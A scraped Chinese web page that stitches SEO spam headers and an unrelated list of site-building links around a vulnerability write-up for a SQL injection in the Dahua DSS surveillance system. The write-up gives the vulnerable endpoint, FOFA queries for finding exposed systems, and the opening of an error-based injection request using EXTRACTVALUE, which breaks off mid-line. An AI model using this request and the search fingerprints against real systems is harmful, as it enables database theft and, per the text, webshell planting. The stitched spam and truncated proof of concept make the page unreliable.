当前位置: 首页 > news >正文

自己的电脑建网站广州安全教育平台入口

自己的电脑建网站,广州安全教育平台入口,贵金属交易平台,钢铁网站建设0x01 产品简介 大华 DSS 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。 0x02 漏洞概述 大华 DSS存在SQL注入漏洞,攻击者 /portal/attachment_getAttList.action 路由发送特殊构造的数据包,利用报错注入获…

0x01 产品简介

大华 DSS 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。

0x02 漏洞概述

大华 DSS存在SQL注入漏洞,攻击者 /portal/attachment_getAttList.action 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:

body="<meta http-equiv=\"refresh\" content=\"1;url='/admin'\"></span>" || body="dahuaDefined/headCommon.js" || title=="DSS"

0x04 漏洞复现 

PoC

GET /portal/attachment_getAttList.action?bean.TabName=1&bean.RecId=1%27)%20AND%20EXTRACTVALUE(88
http://www.yayakq.cn/news/714329/

相关文章:

  • 成品网站是什么意思做排名优化
  • 网站营销力有一个域名做网站
  • 如何利用社交网站做招聘合肥市网站优化
  • 贵州网站开发流程起点签约的书网站给做封面吗
  • 网站美工主要工作是什么淘宝客如何做网站
  • 新手做网站做什么样的wordpress 备份工具怎么使用
  • 做网站要什么颜色模式医院网站设计与实现
  • 桂林网站建设兼职电子商务网站后台核心管理
  • 网站备案没通过做电商如何推广
  • 长春做网站公司哪家好浙江网站设计公司电话
  • 太原高端网站建设网站建设移动网络
  • 网站建设验收评审标准上海推广服务
  • 重庆网站建设 渝济南百度公司
  • 网站开发师职责圆方k20在线设计网站
  • 如何做网站快捷键的元素wordpress的手机客户端
  • 微信视频网站怎么做平面设计公司属于什么行业类别
  • 公司做网站文案怎么写昆明网站搭建
  • 赤水网站建设微信公众号如何运营与推广
  • 西安网站的设计说明dz网站源码
  • 厦门 网站开发wordpress主题图片消失
  • 建材网站建设 南宁怎么建一个网站卖东西
  • 建站视频教程网藁城 网站
  • cn域名做网站网站建设的竞争力
  • 怎么自建设部网站查询公司资质广西南宁市住房和城乡建设局网站
  • 申请摇号广州网站旅游景点网站设计
  • 企业网站新模式wordpress加备案号
  • 淘宝客网站应该怎么做网站接入协议及接入商资质
  • 访问一个网站的过程龙岩高风险地区
  • 通信管理局网站备案昆明网站制作定制公司
  • 网站受众群体工作室建设